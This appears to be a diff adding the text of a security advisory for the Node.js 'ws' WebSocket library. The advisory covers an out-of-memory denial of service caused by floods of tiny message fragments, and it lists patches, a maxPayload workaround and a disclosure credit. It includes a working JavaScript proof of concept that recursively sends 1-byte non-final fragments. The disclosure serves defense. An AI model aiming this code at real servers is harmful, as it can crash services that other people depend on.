+ "details": "### Impact\n\nA high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.\n\n### Proof of concept\n\n```js\nimport { WebSocket, WebSocketServer } from 'ws';\n\nconst wss = new WebSocketServer({ port: 0 }, function () {\n const data = Buffer.alloc(1);\n const options = { fin: false };\n const { port } = wss.address();\n const ws = new WebSocket(`ws://localhost:${port}`);\n\n ws.on('open', function () {\n (function send() {\n ws.send(data, options, function (err) {\n if (err) return;\n send();\n });\n })();\n });\n\n ws.on('error', console.error);\n ws.on('close', function (code, reason) {\n console.log(`client close - code: ${code} reason: ${reason.toString()}`);\n });\n});\n\nwss.on('connection', function (ws) {\n ws.on('error', console.error);\n ws.on('close', function (code, reason) {\n console.log(`server close - code: ${code} reason: ${reason.toString()}`);\n });\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).\n\n### Workarounds\n\nIn vulnerable versions, the issue can be mitigated by lowering the value of the `maxPayload` option if possible.\n\n### Credits\n\nThe vulnerability was responsibly disclosed and fixed by [Nadav Magier](https://github.com/Nadav0077).",
0 commit comments